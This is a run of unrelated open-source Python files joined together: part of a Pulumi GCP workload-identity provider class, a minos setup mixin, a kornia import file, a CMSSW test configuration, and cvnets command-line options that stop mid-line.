_utilities.get_resource_args_opts(WorkloadIdentityPoolProviderArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, attribute_condition: Optional[pulumi.Input[str]] = None, attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None, description: Optional[pulumi.Input[str]] = None, disabled: Optional[pulumi.Input[bool]] = None, display_name: Optional[pulumi.Input[str]] = None, oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None, project: Optional[pulumi.Input[str]] = None, workload_identity_pool_id: Optional[pulumi.Input[str]] = None, workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = WorkloadIdentityPoolProviderArgs.__new__(WorkloadIdentityPoolProviderArgs) __props__.__dict__["attribute_condition"] = attribute_condition __props__.__dict__["attribute_mapping"] = attribute_mapping __props__.__dict__["aws"] = aws __props__.__dict__["description"] = description __props__.__dict__["disabled"] = disabled __props__.__dict__["display_name"] = display_name __props__.__dict__["oidc"] = oidc __props__.__dict__["project"] = project if workload_identity_pool_id is None and not opts.urn: raise TypeError("Missing required property 'workload_identity_pool_id'") __props__.__dict__["workload_identity_pool_id"] = workload_identity_pool_id if workload_identity_pool_provider_id is None and not opts.urn: raise TypeError("Missing required property 'workload_identity_pool_provider_id'") __props__.__dict__["workload_identity_pool_provider_id"] = workload_identity_pool_provider_id __props__.__dict__["name"] = None __props__.__dict__["state"] = None super(WorkloadIdentityPoolProvider, __self__).__init__( 'gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, attribute_condition: Optional[pulumi.Input[str]] = None, attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None, description: Optional[pulumi.Input[str]] = None, disabled: Optional[pulumi.Input[bool]] = None, display_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None, project: Optional[pulumi.Input[str]] = None, state: Optional[pulumi.Input[str]] = None, workload_identity_pool_id: Optional[pulumi.Input[str]] = None, workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None) -> 'WorkloadIdentityPoolProvider': """ Get an existing WorkloadIdentityPoolProvider resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. :param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. :param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input[str] name: The resource name of the provider as 'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'. :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[str] state: The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider until it is permanently deleted. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _WorkloadIdentityPoolProviderState.__new__(_WorkloadIdentityPoolProviderState) __props__.__dict__["attribute_condition"] = attribute_condition __props__.__dict__["attribute_mapping"] = attribute_mapping __props__.__dict__["aws"] = aws __props__.__dict__["description"] = description __props__.__dict__["disabled"] = disabled __props__.__dict__["display_name"] = display_name __props__.__dict__["name"] = name __props__.__dict__["oidc"] = oidc __props__.__dict__["project"] = project __props__.__dict__["state"] = state __props__.__dict__["workload_identity_pool_id"] = workload_identity_pool_id __props__.__dict__["workload_identity_pool_provider_id"] = workload_identity_pool_provider_id return WorkloadIdentityPoolProvider(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="attributeCondition") def attribute_condition(self) -> pulumi.Output[Optional[str]]: """ [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` """ return pulumi.get(self, "attribute_condition") @property @pulumi.getter(name="attributeMapping") def attribute_mapping(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` """ return pulumi.get(self, "attribute_mapping") @property @pulumi.getter def aws(self) -> pulumi.Output[Optional['outputs.WorkloadIdentityPoolProviderAws']]: """ An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. """ return pulumi.get(self, "aws") @property @pulumi.getter def description(self) -> pulumi.Output[Optional[str]]: """ A description for the provider. Cannot exceed 256 characters. """ return pulumi.get(self, "description") @property @pulumi.getter def disabled(self) -> pulumi.Output[Optional[bool]]: """ Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. """ return pulumi.get(self, "disabled") @property @pulumi.getter(name="displayName") def display_name(self) -> pulumi.Output[Optional[str]]: """ A display name for the provider. Cannot exceed 32 characters. """ return pulumi.get(self, "display_name") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The resource name of the provider as 'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'. """ return pulumi.get(self, "name") @property @pulumi.getter def oidc(self) -> pulumi.Output[Optional['outputs.WorkloadIdentityPoolProviderOidc']]: """ An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. """ return pulumi.get(self, "oidc") @property @pulumi.getter def project(self) -> pulumi.Output[str]: """ The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """ return pulumi.get(self, "project") @property @pulumi.getter def state(self) -> pulumi.Output[str]: """ The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider until it is permanently deleted. """ return pulumi.get(self, "state") @property @pulumi.getter(name="workloadIdentityPoolId") def workload_identity_pool_id(self) -> pulumi.Output[str]: """ The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """ return pulumi.get(self, "workload_identity_pool_id") @property @pulumi.getter(name="workloadIdentityPoolProviderId") def workload_identity_pool_provider_id(self) -> pulumi.Output[str]: """ The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """ return pulumi.get(self, "workload_identity_pool_provider_id")
packages/core/minos-microservice-common/minos/common/setup.py
minos-framework/minos-python
247
29767
from __future__ import ( annotations, ) import logging import warnings from pathlib import ( Path, ) from typing import ( TYPE_CHECKING, Optional, Type, TypeVar, Union, ) from .object import ( Object, ) if TYPE_CHECKING: from .config import ( Config, ) logger = logging.getLogger(__name__) S = TypeVar("S", bound="SetupMixin") class SetupMixin(Object): """Setup Mixin class.""" def __init__(self, *args, already_setup: bool = False, **kwargs): super().__init__(**kwargs) self._already_setup = already_setup @property def already_setup(self) -> bool: """Already Setup getter. :return: A boolean value. """ return self._already_setup @property def already_destroyed(self) -> bool: """Already Destroy getter. :return: A boolean value. """ return not self._already_setup @classmethod def from_config(cls: Type[S], config: Optional[Union[Config, Path]] = None, **kwargs) -> S: """Build a new instance from config. :param config: Config instance. If `None` is provided, default config is chosen. :param kwargs: Additional named arguments. :return: A instance of the called class. """ if isinstance(config, Path): from .config import ( Config, ) config = Config(config) if config is None: from .config import ( Config, ) from .injections import ( Inject, ) config = Inject.resolve(Config) logger.info(f"Building a {cls.__name__!r} instance from config...") return cls._from_config(config=config, **kwargs) @classmethod def _from_config(cls: Type[S], config: Config, **kwargs) -> S: return cls(**kwargs) async def __aenter__(self: S) -> S: await self.setup() return self async def setup(self) -> None: """Setup miscellaneous repository things. :return: This method does not return anything. """ if not self._already_setup: logger.debug(f"Setting up a {type(self).__name__!r} instance...") await self._setup() self._already_setup = True async def _setup(self) -> None: return async def __aexit__(self, exc_type, exc_value, exc_traceback): await self.destroy() async def destroy(self) -> None: """Destroy miscellaneous repository things. :return: This method does not return anything. """ if self._already_setup: logger.debug(f"Destroying a {type(self).__name__!r} instance...") await self._destroy() self._already_setup = False async def _destroy(self) -> None: """Destroy miscellaneous repository things.""" def __del__(self): if not getattr(self, "already_destroyed", True): warnings.warn( f"A not destroyed {type(self).__name__!r} instance is trying to be deleted...", ResourceWarning ) class MinosSetup(SetupMixin): """Minos Setup class.""" def __init__(self, *args, **kwargs): warnings.warn(f"{MinosSetup!r} has been deprecated. Use {SetupMixin} instead.", DeprecationWarning) super().__init__(*args, **kwargs)
kornia/augmentation/_3d/intensity/__init__.py
Ishticode/kornia
418
29771
<gh_stars>100-1000 from kornia.augmentation._3d.intensity.equalize import RandomEqualize3D from kornia.augmentation._3d.intensity.motion_blur import RandomMotionBlur3D
DataFormats/FWLite/test/RefTest_cfg.py
ckamtsikis/cmssw
852
29779
<reponame>ckamtsikis/cmssw<gh_stars>100-1000 # Configuration file for RefTest_t import FWCore.ParameterSet.Config as cms process = cms.Process("TEST") process.load("FWCore.Framework.test.cmsExceptionsFatal_cff") process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(2) ) process.source = cms.Source("EmptySource") process.WhatsItESProducer = cms.ESProducer("WhatsItESProducer") process.DoodadESSource = cms.ESSource("DoodadESSource") process.Thing = cms.EDProducer("ThingProducer", offsetDelta = cms.int32(1) ) process.OtherThing = cms.EDProducer("OtherThingProducer") process.thingProducer = cms.EDProducer("ThingProducer", offsetDelta = cms.int32(100), nThings = cms.int32(50) ) process.trackOfThingsProducerA = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(0, 1, 2, 3, 4, 5, 6, 7, 8) ) process.trackOfThingsProducerB = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(0, 1, 2, 3) ) process.trackOfThingsProducerC = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(4, 5, 6, 7) ) process.trackOfThingsProducerD = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(10, 11, 12, 13, 14, 15, 16, 17, 18) ) process.trackOfThingsProducerDMinus = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(10, 11, 12, 13, 14, 15, 16, 17) ) process.trackOfThingsProducerDPlus = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(10, 11, 12, 13, 14, 15, 16, 17, 18, 21) ) process.trackOfThingsProducerE = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(10, 11, 12, 13, 14) ) process.trackOfThingsProducerF = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(14, 15, 16, 17) ) process.trackOfThingsProducerG = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(20, 21, 22, 23, 24, 25, 26, 27, 28) ) process.trackOfThingsProducerH = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(20, 21, 22, 23) ) process.trackOfThingsProducerI = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(24, 25, 26, 27) ) process.trackOfThingsProducerJ = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(30, 31, 32, 33, 34, 35, 36, 37, 38) ) process.trackOfThingsProducerK = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(30, 31, 32, 33) ) process.trackOfThingsProducerL = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(34, 35, 36, 37) ) process.trackOfThingsProducerM = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(40, 41, 42, 43, 44, 45, 46, 47, 48) ) process.trackOfThingsProducerN = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(40, 41, 42, 43) ) process.trackOfThingsProducerO = cms.EDProducer("TrackOfThingsProducer", inputTag = cms.InputTag('thingProducer'), keysToReference = cms.vuint32(44, 45, 46, 47) ) process.thinningThingProducerA = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thingProducer'), trackTag = cms.InputTag('trackOfThingsProducerA'), offsetToThinnedKey = cms.uint32(0), expectedCollectionSize = cms.uint32(50) ) process.thinningThingProducerB = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thinningThingProducerA'), trackTag = cms.InputTag('trackOfThingsProducerB'), offsetToThinnedKey = cms.uint32(0), expectedCollectionSize = cms.uint32(9) ) process.thinningThingProducerC = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thinningThingProducerA'), trackTag = cms.InputTag('trackOfThingsProducerC'), offsetToThinnedKey = cms.uint32(0), expectedCollectionSize = cms.uint32(9) ) process.thinningThingProducerD = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thingProducer'), trackTag = cms.InputTag('trackOfThingsProducerD'), offsetToThinnedKey = cms.uint32(0), expectedCollectionSize = cms.uint32(50) ) process.thinningThingProducerE = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thinningThingProducerD'), trackTag = cms.InputTag('trackOfThingsProducerE'), offsetToThinnedKey = cms.uint32(10), expectedCollectionSize = cms.uint32(9) ) process.thinningThingProducerF = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thinningThingProducerD'), trackTag = cms.InputTag('trackOfThingsProducerF'), offsetToThinnedKey = cms.uint32(10), expectedCollectionSize = cms.uint32(9) ) process.thinningThingProducerG = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thingProducer'), trackTag = cms.InputTag('trackOfThingsProducerG'), offsetToThinnedKey = cms.uint32(0), expectedCollectionSize = cms.uint32(50) ) process.thinningThingProducerH = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thinningThingProducerG'), trackTag = cms.InputTag('trackOfThingsProducerH'), offsetToThinnedKey = cms.uint32(20), expectedCollectionSize = cms.uint32(9) ) process.thinningThingProducerI = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thinningThingProducerG'), trackTag = cms.InputTag('trackOfThingsProducerI'), offsetToThinnedKey = cms.uint32(20), expectedCollectionSize = cms.uint32(9) ) process.thinningThingProducerJ = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thingProducer'), trackTag = cms.InputTag('trackOfThingsProducerJ'), offsetToThinnedKey = cms.uint32(0), expectedCollectionSize = cms.uint32(50) ) process.thinningThingProducerK = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thinningThingProducerJ'), trackTag = cms.InputTag('trackOfThingsProducerK'), offsetToThinnedKey = cms.uint32(30), expectedCollectionSize = cms.uint32(9) ) process.thinningThingProducerL = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thinningThingProducerJ'), trackTag = cms.InputTag('trackOfThingsProducerL'), offsetToThinnedKey = cms.uint32(30), expectedCollectionSize = cms.uint32(9) ) process.thinningThingProducerM = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thingProducer'), trackTag = cms.InputTag('trackOfThingsProducerM'), offsetToThinnedKey = cms.uint32(0), expectedCollectionSize = cms.uint32(50) ) process.thinningThingProducerN = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thinningThingProducerM'), trackTag = cms.InputTag('trackOfThingsProducerN'), offsetToThinnedKey = cms.uint32(40), expectedCollectionSize = cms.uint32(9) ) process.thinningThingProducerO = cms.EDProducer("ThinningThingProducer", inputTag = cms.InputTag('thinningThingProducerM'), trackTag = cms.InputTag('trackOfThingsProducerO'), offsetToThinnedKey = cms.uint32(40), expectedCollectionSize = cms.uint32(9) ) process.out = cms.OutputModule("PoolOutputModule", fileName = cms.untracked.string('goodDataFormatsFWLite.root'), outputCommands = cms.untracked.vstring( 'keep *', 'drop *_thingProducer_*_*', 'drop *_thinningThingProducerD_*_*', 'drop *_thinningThingProducerH_*_*', 'drop *_thinningThingProducerI_*_*', 'drop *_thinningThingProducerJ_*_*', 'drop *_thinningThingProducerK_*_*', 'drop *_thinningThingProducerL_*_*', 'drop *_thinningThingProducerM_*_*', 'drop *_thinningThingProducerN_*_*', ) ) process.out2 = cms.OutputModule("PoolOutputModule", fileName = cms.untracked.string('good2DataFormatsFWLite.root') ) process.out_other = cms.OutputModule("PoolOutputModule", outputCommands = cms.untracked.vstring('drop *', 'keep edmtestOtherThings_*_*_*', 'keep *_TriggerResults_*_*'), fileName = cms.untracked.string('other_onlyDataFormatsFWLite.root') ) process.thinningTestPath = cms.Path(process.thingProducer * process.trackOfThingsProducerA * process.trackOfThingsProducerB * process.trackOfThingsProducerC * process.trackOfThingsProducerD * process.trackOfThingsProducerDMinus * process.trackOfThingsProducerDPlus * process.trackOfThingsProducerE * process.trackOfThingsProducerF * process.trackOfThingsProducerG * process.trackOfThingsProducerH * process.trackOfThingsProducerI * process.trackOfThingsProducerJ * process.trackOfThingsProducerK * process.trackOfThingsProducerL * process.trackOfThingsProducerM * process.trackOfThingsProducerN * process.trackOfThingsProducerO * process.thinningThingProducerA * process.thinningThingProducerB * process.thinningThingProducerC * process.thinningThingProducerD * process.thinningThingProducerE * process.thinningThingProducerF * process.thinningThingProducerG * process.thinningThingProducerH * process.thinningThingProducerI * process.thinningThingProducerJ * process.thinningThingProducerK * process.thinningThingProducerL * process.thinningThingProducerM * process.thinningThingProducerN * process.thinningThingProducerO ) process.p = cms.Path(process.Thing*process.OtherThing) process.outp = cms.EndPath(process.out*process.out2*process.out_other)
options/opts.py
apple/ml-cvnets
209
29794
# # For licensing see accompanying LICENSE file. # Copyright (C) 2022 Apple Inc. All Rights Reserved. # import argparse from typing import Optional from data.sampler import arguments_sampler from data.collate_fns import arguments_collate_fn from options.utils import load_config_file from data.datasets import arguments_dataset from cvnets import arguments_model, arguments_nn_layers, arguments_ema from cvnets.anchor_generator import arguments_anchor_gen from loss_fn import arguments_loss_fn from optim import arguments_optimizer from optim.scheduler import arguments_scheduler from common import SUPPORTED_MODALITIES from data.transforms import arguments_augmentation from metrics import arguments_stats from data.video_reader import arguments_video_reader from cvnets.matcher_det import arguments_box_matcher from utils import logger class ParseKwargs(argparse.Action): def __call__(self, parser, namespace, values, option_string=None): namespace_dict = vars(namespace) if len(values) > 0: override_dict = {} # values are list of key-value pairs for value in values: key = None try: key, value = value.split("=") except ValueError as e: logger.error( "For override arguments, a key-value pair of the form key=value is expected" ) if key in namespace_dict: value_namespace = namespace_dict[key] if value_namespace is None and value is None: value = None elif value_namespace is None and value is not None: # possibly a string or list of strings or list of integers # check if string is a list or not value = value.split(",") if len(value) == 1: # its a string value = str(value[0]) # check if its empty string or not if value == "" or value.lower() == "none": value = None else: # its a list of integers or strings try: # convert to int value = [int(v) for v in value] except: # pass because its a string pass else: try: if value.lower() == "true": # check for boolean value = True elif value.lower() == "false": value = False else: desired_type = type(value_namespace) value = desired_type(value) except ValueError as e: logger.warning( "Type mismatch while over-riding. Skipping key: {}".format( key ) ) continue override_dict[key] = value setattr(namespace, "override_args", override_dict) else: setattr(namespace, "override_args", None) def arguments_common(parser: argparse.ArgumentParser) -> argparse.ArgumentParser: group = parser.add_argument_group( title="Common arguments", description="Common arguments" ) group.add_argument("--common.seed", type=int, default=0, help="Random seed") group.add_argument( "--common.config-file", type=str, default=None, help="Configuration file" ) group.add_argument( "--common.results-loc", type=str, default="results", help="Directory where results will be stored", ) group.add_argument( "--common.run-label", type=str, default="run_1", help="Label id for the current run", ) group.add_argument( "--common.resume", type=str, default=None, help="Resume location" ) group.add_argument( "--common.finetune_imagenet1k", type=str, default=None, help="Checkpoint location to be used for finetuning", ) group.add_argument( "--common.finetune_imagenet1k-ema", type=str, default=None, help="EMA Checkpoint location to be used for finetuning", ) group.add_argument( "--common.mixed-precision", action="store_true", help="Mixed precision training" ) group.add_argument( "--common.accum-freq", type=int, default=1, help="Accumulate gradients for this number of iterations", ) group.add_argument( "--common.accum-after-epoch", type=int, default=0, help="Start accumulation after this many epochs", ) group.add_argument( "--common.log-freq", type=int, default=100, help="Display after these many iterations", ) group.add_argument( "--common.auto-resume", action="store_true", help="Resume training from the last checkpoint", ) group.add_argument( "--common.grad-clip", type=float, default=None, help="Gradient clipping value" ) group.add_argument( "--common.k-best-checkpoints", type=int, default=5, help="Keep k-best checkpoints", ) group.add_argument( "--common.inference-modality", type=str, default="image", choices=SUPPORTED_MODALITIES, help="Inference modality. Image or videos", ) group.add_argument( "--common.channels-last", action="store_true", default=False, help="Use channel last format during training. " "Note 1: that some models may not support it, so we recommend to use it with caution" "Note 2: Channel last format does not work with 1-, 2-, and 3- tensors. " "Therefore, we support it via custom collate functions", ) group.add_argument( "--common.tensorboard-logging", action="store_true", help="Enable tensorboard logging", ) group.add_argument( "--common.bolt-logging", action="store_true", help="Enable bolt logging" ) group.add_argument( "--common.override-kwargs", nargs="*", action=ParseKwargs, help="Override arguments. Example. To override the value of --sampler.vbs.crop-size-width, " "we can pass override argument as " "--common.override-kwargs sampler.vbs.crop_size_width=512 \n " "Note that keys in override arguments do not contain -- or -", ) group.add_argument( "--common.enable-coreml-compatible-module", action="store_true", help="Use coreml compatible modules (if applicable) during inference", ) group.add_argument( "--common.debug-mode", action="store_true", help="You can use this flag for debugging purposes.", ) return parser def arguments_ddp(parser: argparse.ArgumentParser) -> argparse.ArgumentParser: group = parser.add_argument_group( title="DDP arguments", description="DDP arguments" ) group.add_argument("--ddp.disable", action="store_true", help="Don't use DDP") group.add_argument( "--ddp.rank", type=int, default=0, help="Node rank for distributed training" ) group.add_argument( "--ddp.world-size", type=int, default=-1, help="World size for DDP" ) group.add_argument("--ddp.dist-url", type=str, default=None, help="DDP URL") group.add_argument( "--ddp.dist-port", type=int, default=30786, help="DDP Port. Only used when --ddp.dist-url is not specified", ) group.add_argument("--ddp.device-id", type=int, default=None, help="Device ID") group.add_argument( "--ddp.no-spawn", action="store_true", help="Don't use DDP with spawn" ) group.add_argument( "--ddp.backend", type=str, default="nccl", help="DDP backend. Default is nccl" ) group.add_argument( "--ddp.find-unused-params", action="store_true", help="Find unused params in model. useful for debugging with DDP", ) return parser def get_training_arguments(parse_args: Optional[bool] = True): parser = argparse.ArgumentParser(description="Training arguments", add_help=True) # sampler related arguments parser = arguments_sampler(parser=parser) # dataset related arguments parser = arguments_dataset(parser=parser) # anchor generator arguments parser = arguments_anchor_gen(parser=parser) # arguments related to box matcher parser = arguments_box_matcher(parser=parser) # Video reader related arguments parser = arguments_video_reader(parser=parser) # collate fn related arguments parser = arguments_collate_fn(parser=parser) # transform related arguments parser = arguments_augmentation(parser=parser) # model related arguments parser = arguments_nn_layers(parser=parser) parser = arguments_model(parser=parser) parser = arguments_ema(parser=parser) # loss function arguments parser = arguments_loss_fn(parser=parser) # optimizer arguments parser = arguments_optimizer(parser=parser) parser = arguments_scheduler(parser=parser) # DDP arguments parser = 